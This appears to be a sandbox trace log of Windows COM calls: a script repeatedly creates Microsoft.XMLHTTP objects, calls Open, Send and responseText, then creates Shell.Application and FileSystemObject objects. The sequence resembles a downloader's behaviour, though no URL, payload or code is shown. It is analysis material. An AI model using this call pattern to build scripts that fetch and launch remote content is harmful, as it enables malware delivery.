	[0754.025] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0754.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0754.025] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7260) returned 0x0
	[0754.025] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0754.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72c8) returned 0x0
	[0754.025] ??2@YAPEAX_K@Z () returned 0x62f310
	[0754.025] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72c8, pUnkSite=0x62f310) 
	[0754.025] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0754.025] XMLHTTPRequest:IUnknown:Release (This=0x49c72c8) returned 0x0
	[0754.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7260) returned 0x0
	[0754.025] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7260) returned 0x3
	[0754.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0754.026] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0754.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0754.026] longjmp () 
	[0754.026] longjmp () 
	[0754.026] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0754.026] SysStringLen (param_1=0x0) returned 0x0
	[0754.026] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0754.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0754.026] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0754.027] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0754.027] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0754.027] ??2@YAPEAX_K@Z () returned 0x62f330
	[0754.027] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0754.027] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0754.027] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0754.027] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0754.027] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0754.027] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0754.027] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0754.027] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0754.027] longjmp () 
	[0754.028] longjmp () 
	[0754.028] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0754.028] SysStringLen (param_1=0x0) returned 0x0
	[0754.028] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0754.028] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0754.028] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0754.028] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0754.028] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0754.028] ??2@YAPEAX_K@Z () returned 0x62f310
	[0754.028] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0754.028] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0754.028] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0754.028] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0754.029] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0754.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0754.029] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0754.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0754.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0754.029] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0754.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0757.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0757.839] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0757.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0757.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0757.840] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0757.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0757.840] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0757.840] SysStringLen (param_1=0x0) returned 0x0
	[0757.840] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0757.840] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0757.841] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0757.841] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0757.841] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0757.841] ??2@YAPEAX_K@Z () returned 0x62f350
	[0757.841] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0757.841] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0757.841] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0757.841] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0757.841] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0757.841] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0757.841] SysStringLen (param_1=0x0) returned 0x0
	[0757.841] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0757.845] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0757.845] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0757.845] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0757.845] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0757.845] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0757.845] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0759.808] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0759.808] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0759.808] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0759.812] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0759.812] SysStringLen (param_1=0x0) returned 0x0
	[0759.812] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0759.813] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0759.813] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0759.813] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0759.813] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0759.813] ??2@YAPEAX_K@Z () returned 0x62f310
	[0759.813] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f310) 
	[0759.813] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0759.813] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0759.813] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0759.813] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0759.813] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0759.813] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0759.816] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0759.816] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0759.816] SysStringLen (param_1=0x0) returned 0x0
